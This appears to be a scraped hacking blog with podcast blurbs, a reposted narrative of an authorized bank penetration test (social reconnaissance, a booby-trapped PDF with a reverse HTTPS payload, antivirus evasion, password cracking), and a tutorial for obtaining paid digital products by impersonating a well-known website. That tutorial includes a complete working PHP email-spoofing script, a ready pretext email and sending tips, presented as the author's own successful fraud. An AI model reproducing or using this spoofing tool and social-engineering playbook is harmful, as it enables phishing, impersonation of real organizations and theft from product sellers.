This Episode of CrackerCast looks at this weeks hacker news and starts in the beginning of the hacking process and goes into detail on Reconnaissance.

Download .mp3 (right-click -> save link as…)

You can subscribe to the podcast feed via one of the two feeds below (might take a day for itunes to update it) :FeedBurner or iTunes

News stories mentioned:

“”

This Episode of CrackerCast looks at this weeks hacker news and describes the different methods hackers use to hack facebook passwords and all other socialnetworking/email websites services.

Download .mp3 (right-click -> save link as…)

You can subscribe to the podcast feed via one of the two feeds below (might take a day for itunes to update it) :FeedBurner or iTunes

News stories mentioned:

“”

I just came across this shnazzy article by SnoSoft describing how their security group was able to penetrate a banking system…completely. It was interesting how they used Social Engineering techniques and took advantage of social networks to help them in the process of pure.. PWNAGE! Yah, it’s kind of long.. but this was the first article I actually read completely in a while. Really interesting read, here it is:

We were recently hired to perform an interesting Advanced Stealth Penetration test for a mid-sized bank. The goal of the penetration test was to penetrate into the bank’s IT Infrastructure and see how far we could get without detection. This is a bit different than most penetration tests as we weren’t tasked with identifying risks as much as we were with demonstrating vulnerability…

The first step of any penetration test is reconnaissance.Reconnaissance is the military term for the passive collection of intelligence about an enemy prior to attacking that enemy. It is technically impossible to effectively attack an enemy without first obtaining actionable intelligence about the enemy. Failure to collect good intelligence can result in significant casualties, unnecessary collateral damage and a completely failed attack. In penetration testing, damages are realized by downed systems and a loss of revenue.

Because this engagement required stealth, we focused on the social attack vectors and Social Reconnaissance. We first targeted FaceBook with our “FaceBook from the hackers perspective“ methodology. That enabled us to map relationships between employees, vendors, friends, family etc. It also enabled us to identify key people in Accounts Receivable / Accounts Payable (“AR/AP”).

In addition to FaceBook, we focused on websites like Monster, Dice, Hot Jobs, LinkedIn, etc. We identified a few interesting IT related job openings that disclosed interesting and useful technical information about the bank. That information included but was not limited to what Intrusion Detection technologies had been deployed, what their primary Operating Systems were for Desktops and Servers, and that they were a Cisco shop.

Naturally, we thought that it was also a good idea to apply for the job to see what else we could learn. To do that, we created a fake resume that was designed to be the “perfect fit” for a “Sr. IT Security Position” (one of the opportunities available). Within one day of submission of our fake resume, we had a telephone screening call scheduled.

We started the screening call with the standard meet and greet, and an explanation of why we were interested in the opportunity. Once we felt that the conversation was flowing smoothly, we began to dig in a bit and start asking various technology questions. In doing so, we learned what Anti-Virus technologies were in use and we also learned what the policies were for controlling outbound network traffic.

That’s all that we needed…

Upon completion of our screening call, we had sufficient information to attempt stealth penetration with a high probability of success. The beauty is that we collected all of this information without sending a single packet to our customer’s network. In summary we learned:

• That the bank uses Windows XP for most Desktops
• Who some of the bank’s vendors were (IT Services)
• The names and email addresses of people in AR/AP
• What Anti-Virus technology the bank uses
• Information about the banks traffic control policies

Based on the intelligence that we collected we decided that the ideal scenario for stealth penetration would be to embed an exploit into a PDF document and to send that PDF document to the bank’s AR/AP department from the banks trusted IT Services provider. This attack was designed to exploit the trust that our customer had with their existing IT Services provider.

When we created the PDF, we used the new reverse https payloadthat was recently released by the Metasploit Project. (Previously we were using similar but more complex techniques for encapsulating our reverse connections in HTTPS). We like reverse HTTPS connections for two reasons:

• First, Intrusion Detection Technologies cannot monitor encrypted network traffic. Using an encrypted reverse connection ensures that we are protected from the prying eyes of Intrusion Detection Systems and less likely to trip alarms.
• Second, most companies allow outbound HTTPS (port 443) because its required to view many websites. The reverse HTTPS payload that we used mimics normal web browsing behavior and so is much less likely to set off any Intrusion Detection events.

Before we sent the PDF to the our customer we checked it against the same Antivirus Technology that they were using to ensure that it was not detected as malware or a virus. To evade the scanners we had to “pack” our pseudo-malware in such a way that it would not be detected by the scanners. Once that was done and tested, we were ready to launch our attack.

When we sent the PDF to our customer, it didn’t take long for the victim in AP/AR to open it, after all it appeared to be a trusted invoice. Once it was opened, the victim’s computer was compromised. That resulted in it establishing a reverse connection to our lab which we then tunneled into to take control of the victims computer (all via HTTPS).

Once we had control, our first order of operation was to maintain access. To do this we installed our own backdoor technology onto the victims computer. Our technology also used outbound HTTPS connections, but for authenticated command retrieval. So if our control connection to the victims computer was lost, we could just tell our backdoor to re-establish the connection.

The next order of operation was to deploy our suite of tools on the compromised system and to begin scoping out the internal network.We used selective ARP poisoning as a first method for performing internal reconnaissance. That proved to be very useful as we were able to quickly identify VNC connections and capture VNC authentication packets. As it turns out, the VNC connections that we captured were being made to the Active Directory (“AD”) server.

We were able to crack the VNC password by using a VNC Cracking Tool. Once that happened we were able to access, the AD server and extract the servers SAM file. We then successfully cracked all of the passwords in that file, including the historical user passwords. Once the passwords were cracked, we found that the same credentials were used across multiple systems. As such, we were not only able to access desktops and servers, but also able to access Cisco devices, etc.

In summary, we were able to penetrate into our customers IT Infrastructure and effectively take control of the entire infrastructure without being detected. We accomplished that by avoiding conventional methods for penetration and by using our own unorthodox yet obviously effective penetration methodologies.

This particular engagement was interesting as our customers goal was not to identify all points of risk, but instead was to identify how deeply we could penetrate. Since the engagement, we’ve worked with that customer to help them create barriers for isolation in the event of penetration. Since those barriers have been implemented, we haven’t been able to penetrate as deeply.

“”

This Episode of CrackerCast looks at this weeks hacker news and introduces you to the world of social engineering.

Download .mp3 (right-click -> save link as…)

You can subscribe to the podcast feed via one of the two feeds below (might take a day for itunes to update it) :FeedBurner or iTunes

News stories mentioned:

“”

Everybody loves free stuff. But is it possible to get non-free items free on the internet? Of Course! Through Social Engineering and E-Mail Spoofing you can, and I will show you how with an example to back me up. By reading the rest of this post you are agreeing to our DISCLAIMER. Doing this is Illegal, so don’t do it. It’s just an interesting scenario to read about.

First I will show you the process step-by-step, then I will post my real life example that successfully worked out for me.

1. Find a website selling a digital product(s) online.
2. Find the website’s main E-Mail address, product creators name and write them down.
3. Locate a well-known high-ranking website that is based on the niche of the product.
4. On this website, find their main E-Mail address. Must be a “@that-sites-name.com” E-Mail. If they have multiple go for the one that has to do with advertising or partnerships. Along with the E-Mail address, get the site owner’s name or the name of whoever takes care of advertising and partnerships. Write them down.
5. Create a new E-Mail address (Gmail) with the popular sites owner’s name in it. This will be used as the site owner’s personal E-Mail. Or so they think.
6. Now it’s time to write up a believable E-Mail. In the E-Mail, talk about how your company/website (the popular one you chose) is looking to make partnerships and affiliate with products like theirs (the item you want to receive). Then state that before you would like to continue with the partnership, you would like to get a copy of the product to review it to decide whether you would like to continue with the partnership. If the website you are pretending to be is a large and well known, the product owner will realize that he/she could make a lot of money with you, and will send you a copy of the product without hesitation. (See example below)
7. Now it’s time to send the E-Mail. We will be using the PHP script I wrote below to spoof the E-Mail and make it look like it came from a trusted source (the popular website).
8. I would highly suggest running the script off your own computer using Wamp (Windows) or Mamp (Mac) with an SMTP server. If you don’t know how to do this, sign up for the E-mail list on the right and you can see a video on it. If your ISP doesn’t allow you send your own E-Mails, then upload it to a webserver that supports PHP and the PHP mail() function. If you decide to use a online hosting service, there will be a higher chance that the E-Mail sent will be flagged as spam.
9. Run this script and you should see the following form: http://www.MrCracker.com/form/mail.php Don’t try to use it. It’s disabled.
10. Fill in the spoofed E-Mail. This is the E-Mail of the E-Mail you are spoofing, in other words, the E-Mail that you are impersonating. (The popular site’s E-Mail)
11. Fill in the target’s E-Mail, the product owner’s E-Mail.
12. Fill in the reply E-Mail. This is the E-Mail that you created to be used as the site owner’s E-mail. When the target hits reply, the E-Mail will be sent to this E-mail.
13. Keep the message title short.
14. Now fill in the actual message. Make sure to format the message with HTML otherwise it’ll be sent without line spaces. To add a line break use the HTML command <br />.
15. Before you send the E-Mail, first send it to your own E-Mail to see how it looks like. Once everything is correct, you can send it off to the actual product owner.
16. Now wait, and hopefully you will get a reply with a download link or attachment.

The E-Mail spoofer PHP script:

<?php
/*

E-Mail Spoofer
MrCracker.com

*/

if($_POST['submit']){ //if submit is hit continue...

$spoof = (stripslashes(trim($_POST['spoof']))); //sanitizes all the user input.
$target = (stripslashes(trim($_POST['target'])));
$reply =  (stripslashes(trim($_POST['reply'])));
$title = str_replace(array("n", "r"), '', stripslashes(trim($_POST['title'])));
$body  = (stripslashes(trim($_POST['body'])));

$headers  = "From: $spoofrn";
$headers .= "Reply-To: $replyrn";
$headers .= 'MIME-Version: 1.0' . "n";
$headers .= 'Content-type: text/html; charset=iso-8859-1' . "rn";

$regex="/^[a-zA-Z][w .-]+[a-zA-Z0-9]@([a-zA-Z0-9][a-zA-Z0-9-]*.)+[a-zA-Z]{2,4}$/"; //Compares input email to this pattern to make sure it is a valid email.
if($spoof == "" || !preg_match($regex, $spoof)){

echo "<font color='red'><b> Error: No Spoof Email Provided or Email Invalid!
</font></b>"; //error checking
exit;
}
elseif($target == "" || !preg_match($regex, $target)){
echo "<font color='red'><b> Error: No Target Email Provided or Email Invalid!
</font></b>";
exit;
}
elseif($reply == ""){
echo "<font color='red'><b> Error: No Reply Email Provided! </font></b>";
exit;
}
elseif($title == ""){
echo "<font color='red'><b> Error: No Email Title Provided! </font></b>";
exit;
}
elseif($body == ""){
echo "<font color='red'><b> Error: No Email Body Provided! </font></b>";
exit;
}
else{
mail($target, $title, $body, $headers); //if there are no errors, send the email
echo "Mail Was Sent!";
}
}
else{ //if submit wasn't hit, show the HTML form
?>
<!-- This is the CSS which makes the form look the way it does. -->
<html>
<body>
<style type="text/css">
body {
font-family: Arial;
font-size: .9em;
}
input {
background: #ECFDCE;
border: 1px solid green;
}
textarea {
background: #ECFDCE;
border: 1px solid green;
}
legend {
border: 1px solid #048DB4;
background: #F0F8FF;
}

fieldset {
border: 1px solid #048DB4;
width: 18.7em;
padding-left: 11px;
padding-bottom: 20px;
background: #F0F8FF;
}
<!-- This is the HTML form -->
</style>
<fieldset>
<legend>Email Spoofer</legend>
<form action="" method="POST">
Spoofed Email:<br>
<input type="text" size="40" name="spoof"><br>
Targets Email:<br>
<input type="text" size="40" name="target"><br>
Reply Email:<br>
<input type="text" size="40" name="reply"><br>
Message Title:<br>
<input type="text"size="40" name="title"><br>
Message Body:<br>
<textarea rows="10" cols="30" name="body">
</textarea><br>
<input type="submit" value="Submit" name="submit">
<input type="reset" value="Clear">
</form>
</fieldset>
</body>
</html>
<?php
}
?>
</pre>

In the example, I will show you how I used this on someone I know to see if it worked. As you will see, I will not be naming the specific websites or people.

Spoofed Email: advertising@big-sample-site.com

Target Email: Name@product-site.com

Reply To: Site-Big-Owners-Name@Gmail.com

Message Title: Product Name Partnership

Message Body: Hello Product-Owner-Name,

Big-Sample-Site.com is looking to make some new affiliations to raise funding and your “Product Name” has caught our attention. We only consider serious and professional products. Before we consider anything else, would you be willing to send us a copy of your product so that we may review it and decide whether we would still like to pursue this partnership.<br /><br />

If you are interested, please reply to this E-Mail as soon as possible. <br /><br />

-Name <br />

Big-Sample-Website.com <br />

Notice how I added <br /> into the message. This is important so that line breaks are created. If they aren’t added, the whole message will be received in one giant paragraph and won’t look professional.

The next day, I had the product in my E-Mail, and I notified my friend about this kind of attack.

Note: This is a shot or miss thing. Some people will get suspicious and send the actual product to the original E-Mail isntead of the changed reply E-Mail address. Sometimes people will fall for regular free E-Mail address. If you use a free E-Mail address, you won’t have to spoof the E-Mail and risk have it sent to spam, or having the target reply to the wrong E-Mail, so that’s also worth a try.”"